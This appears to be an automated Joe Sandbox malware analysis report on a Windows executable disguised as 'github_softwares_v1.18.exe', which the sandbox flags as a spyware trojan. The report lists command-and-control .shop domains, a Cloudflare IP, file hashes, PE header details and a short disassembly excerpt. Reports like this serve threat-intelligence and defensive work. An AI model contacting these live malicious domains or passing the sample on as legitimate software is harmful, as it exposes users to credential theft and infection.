              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              stimultaionsppzv.shop100%Avira URL Cloudmalware
              http://html4/loose.dtd0%Avira URL Cloudsafe
              bravedreacisopm.shop100%Avira URL Cloudphishing
              https://weaknessmznxo.shop/api100%Avira URL Cloudmalware
              https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
              https://weaknessmznxo.shop/GHd0%Avira URL Cloudsafe
              horizonvxjis.shop0%Avira URL Cloudsafe
              https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
              weaknessmznxo.shop0%Avira URL Cloudsafe
              https://weaknessmznxo.shop/api-L0%Avira URL Cloudsafe
              https://weaknessmznxo.shop/H0%Avira URL Cloudsafe
              http://.css0%Avira URL Cloudsafe
              https://weaknessmznxo.shop:443/api100%Avira URL Cloudmalware
              https://weaknessmznxo.shop/220%Avira URL Cloudsafe
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
              https://weaknessmznxo.shop/api0fB?0%Avira URL Cloudsafe
              http://.jpg0%Avira URL Cloudsafe
              parntorpkxzlp.shop0%Avira URL Cloudsafe
              broccoltisop.shop0%Avira URL Cloudsafe
              grassytaisol.shop0%Avira URL Cloudsafe
              https://weaknessmznxo.shop/0%Avira URL Cloudsafe
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
              https://gorm.io/docs/hooks.htmlWarning:0%Avira URL Cloudsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
              https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%Avira URL Cloudsafe
              http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
              https://weaknessmznxo.shop/((0%Avira URL Cloudsafe
              effectivedoxzj.shop100%Avira URL Cloudmalware
              shellfyyousdjz.shop0%Avira URL Cloudsafe
              https://support.microsof0%Avira URL Cloudsafe
              https://weaknessmznxo.shop:443/api60%Avira URL Cloudsafe
              https://weaknessmznxo.shop/apiBU0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              weaknessmznxo.shop
              172.67.159.243
              truetrue
                unknown
                18.31.95.13.in-addr.arpa
                unknown
                unknownfalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  bravedreacisopm.shoptrue
                  • Avira URL Cloud: phishing
                  unknown
                  stimultaionsppzv.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  https://weaknessmznxo.shop/apifalse
                  • Avira URL Cloud: malware
                  unknown
                  horizonvxjis.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  weaknessmznxo.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  broccoltisop.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  grassytaisol.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  parntorpkxzlp.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  effectivedoxzj.shoptrue
                  • Avira URL Cloud: malware
                  unknown
                  shellfyyousdjz.shoptrue
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://html4/loose.dtdgithub_softwares_v1.18.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/chrome_newtabBitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://weaknessmznxo.shop/api-LBitLockerToGo.exe, 00000001.00000003.1716565174.0000000002EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/ac/?q=BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://weaknessmznxo.shop/GHdBitLockerToGo.exe, 00000001.00000003.1754529360.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1754816151.0000000002F02000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://.cssgithub_softwares_v1.18.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  https://weaknessmznxo.shop/HBitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://weaknessmznxo.shop:443/apiBitLockerToGo.exe, 00000001.00000003.1830856779.0000000002EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  unknown
                  https://weaknessmznxo.shop/22BitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiBitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://x1.c.lencr.org/0BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://x1.i.lencr.org/0BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallBitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://weaknessmznxo.shop/api0fB?BitLockerToGo.exe, 00000001.00000003.1743040571.0000000002EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://support.mozilla.org/products/firefoxgro.allBitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://.jpggithub_softwares_v1.18.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgBitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoBitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://weaknessmznxo.shop/BitLockerToGo.exe, 00000001.00000003.1743040571.0000000002EF5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://gorm.io/docs/hooks.htmlWarning:github_softwares_v1.18.exefalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaBitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016BitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000001.00000003.1756527742.00000000050F4000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://ac.ecosia.org/autocomplete?q=BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://weaknessmznxo.shop/((BitLockerToGo.exe, 00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgBitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.microsofBitLockerToGo.exe, 00000001.00000003.1730889198.0000000004FFD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crt.rootca1.amazontrust.com/rootca1.cer0?BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBitLockerToGo.exe, 00000001.00000003.1730995668.0000000004FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://weaknessmznxo.shop/hBitLockerToGo.exe, 00000001.00000002.1846072628.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1844557480.0000000002E89000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://weaknessmznxo.shop:443/api6BitLockerToGo.exe, 00000001.00000003.1730573797.0000000002E70000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://weaknessmznxo.shop/apiBUBitLockerToGo.exe, 00000001.00000003.1754529360.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1772726652.0000000002EFB000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.159.243
                    weaknessmznxo.shopUnited States
                    13335CLOUDFLARENETUStrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483201
                    Start date and time:2024-07-26 20:33:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 18s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:6
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:github_softwares_v1.18.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@2/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 34
                    • Number of non-executed functions: 58
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Stop behavior analysis, all processes terminated
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: github_softwares_v1.18.exe
                    TimeTypeDescription
                    14:34:03API Interceptor8x Sleep call for process: BitLockerToGo.exe modified
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 162.159.61.3
                    file.exeGet hashmaliciousBabadedaBrowse
                    • 172.64.41.3
                    https://intralinks.us.com/jallessI1Ae2APharrI1AsassoTxcz01coTxmGet hashmaliciousHTMLPhisherBrowse
                    • 172.67.159.233
                    https://mrlocksmithpenticton.com/mlc/Get hashmaliciousHTMLPhisherBrowse
                    • 188.114.96.3
                    https://new-sneww-online-nowz-all.azurewebsites.net/?referrer=appmetrica_tracking_id%3D173005530304969909%26ym_tracking_id%3D10094745761516744100Get hashmaliciousUnknownBrowse
                    • 104.18.36.155
                    https://portal.avel-erx.com/esync/app/?token=4276f42c-09fa-4876-aa17-00d2659d77a4Get hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                    • 172.67.213.85
                    https://www.canva.com/design/DAGMEHwBhBU/KuqkCNaGGLCBR8SypHXNgw/edit?utm_content=DAGMEHwBhBU&utm_campaign=designshare&utm_medium=link2&utm_source=sharebuttonGet hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    Final Shipping Document.exeGet hashmaliciousFormBookBrowse
                    • 188.114.96.3
                    https://forms.office.com/r/qq9c20HBqaGet hashmaliciousTycoon2FABrowse
                    • 104.17.25.14
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    a0e9f5d64349fb13191bc781f81f42e11lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                    • 172.67.159.243
                    file.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                    • 172.67.159.243
                    pn24_065.docx.docGet hashmaliciousUnknownBrowse
                    • 172.67.159.243
                    6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 172.67.159.243
                    PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                    • 172.67.159.243
                    DS_Store.exeGet hashmaliciousCobaltStrike, ReflectiveLoaderBrowse
                    • 172.67.159.243
                    IRqsWvBBMc.exeGet hashmaliciousAmadey, VidarBrowse
                    • 172.67.159.243
                    file.exeGet hashmaliciousUnknownBrowse
                    • 172.67.159.243
                    file.exeGet hashmaliciousUnknownBrowse
                    • 172.67.159.243
                    file.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                    • 172.67.159.243
                    No context
                    Process:C:\Users\user\Desktop\github_softwares_v1.18.exe
                    File Type:GLS_BINARY_LSB_FIRST
                    Category:dropped
                    Size (bytes):160
                    Entropy (8bit):4.438743916256937
                    Encrypted:false
                    SSDEEP:3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
                    MD5:E467C82627F5E1524FDB4415AF19FC73
                    SHA1:B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
                    SHA-256:116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
                    SHA-512:2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............
                    File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                    Entropy (8bit):6.34162212584267
                    TrID:
                    • Win64 Executable (generic) (12005/4) 74.95%
                    • Generic Win/DOS Executable (2004/3) 12.51%
                    • DOS Executable Generic (2002/1) 12.50%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                    File name:github_softwares_v1.18.exe
                    File size:30'190'080 bytes
                    MD5:444cf08b351822e4bec5c4c1b9324942
                    SHA1:d5607171f7aa06682efed7ced3ddaff08e2b384b
                    SHA256:17aad4db38649728ef0e666755351794d4de41d82a36608226d8656ea54233cb
                    SHA512:dbbe22b1c61c62b75d83c747935ed7bf5aad6e6ae55d877e6c249792bce92c0f4341f31f0cc8e30cbe77300f43c8381dbdb1f7fc009631dc19bf5e2692d059cb
                    SSDEEP:196608:AHFeZZu9yZJm/e+tNxR8/pwoXebO7RSlhqo+zSaG:AHR9yb2xNxR6xubOtSvqo+2r
                    TLSH:DC673A03F89144E4D8EDD574C6668217BB717CA84B3027DB2F60F6256F7ABD1AA7A300
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$.........6.............@.............................`......=t....`... ............................
                    Icon Hash:6179db65163a1919
                    Entrypoint:0x1400014c0
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x140000000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                    TLS Callbacks:0x40de3f20, 0x1, 0x40de3ef0, 0x1, 0x40de7990, 0x1
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:1
                    File Version Major:6
                    File Version Minor:1
                    Subsystem Version Major:6
                    Subsystem Version Minor:1
                    Import Hash:a93101e79783d49279cefd4bc83323ac
                    Instruction
                    dec eax
                    sub esp, 28h
                    dec eax
                    mov eax, dword ptr [01C19B75h]
                    mov dword ptr [eax], 00000001h
                    call 00007FAEC868FF5Fh
                    nop
                    nop
                    dec eax
                    add esp, 28h
                    ret
                    nop dword ptr [eax]
                    dec eax
                    sub esp, 28h
                    dec eax
                    mov eax, dword ptr [01C19B55h]
                    mov dword ptr [eax], 00000000h
                    call 00007FAEC868FF3Fh
                    nop
                    nop
                    dec eax
                    add esp, 28h
                    ret
                    nop dword ptr [eax]
                    dec eax
                    sub esp, 28h
                    call 00007FAEC947DABCh
                    dec eax
                    test eax, eax
                    sete al
                    movzx eax, al
                    neg eax
                    dec eax
                    add esp, 28h
                    ret
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    dec eax
                    lea ecx, dword ptr [00000009h]
                    jmp 00007FAEC8690279h
                    nop dword ptr [eax+00h]
                    ret
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    nop
                    jmp dword ptr [eax]
                    inc edi
                    outsd
                    and byte ptr [edx+75h], ah
                    imul ebp, dword ptr [esp+20h], 203A4449h
                    and ah, byte ptr [edi+50h]
                    push ebx
                    jno 00007FAEC86902CFh
                    push edi
                    insd
                    jns 00007FAEC86902D6h
                    push ecx
                    jbe 00007FAEC86902F2h
                    popad
                    dec edx
                    inc ebp
                    outsb
                    push ecx
                    dec edx
                    jno 00007FAEC869031Ch
                    das
                    cmp byte ptr [edi+2Dh], dh
                    insd
                    dec edi
                    dec esp
                    pop ecx
                    jp 00007FAEC86902FAh
                    dec ebx
                    outsb
                    xor al, 39h
                    arpl word ptr [ecx+54h], ax
                    inc sp
                    push ebp
                    dec ecx
                    das
                    dec eax
                    arpl word ptr [esi+70h], si
                    outsd
                    xor dword ptr [ebx+42h], eax
                    push ebx
                    push eax
                    pop ecx
                    jp 00007FAEC86902EAh
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x1d1d0000x4e.edata
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1d1e0000x14ec.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1d220000x11448.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1c1c0000x5832c.pdata
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d340000x41d64.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x1c1a9a00x28.rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x1d1e4bc0x480.idata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000xdee5400xdee600ab963a1cd4f2c55fea7f0c2635408277unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .data0xdf00000xf77b00xf780089ce0c29ad0f90a307db0a1f5a266337False0.3012645991161616dBase III DBT, version number 0, next free block index 10, 1st item "kL1lClsw8KM+ESkkq0p98UV7kc203g="5.182376885907143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rdata0xee80000xd33d100xd33e002840d63f2e3cbf6b304e2b29918cc151unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                    .pdata0x1c1c0000x5832c0x58400cd3b1509b139a09337c75caba7588515False0.40110437322946174data6.023100042235163IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                    .xdata0x1c750000x34fc0x3600474362023b9a8d8006963176bcb1a894False0.1916232638888889data4.476075708233727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                    .bss0x1c790000xa35600x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
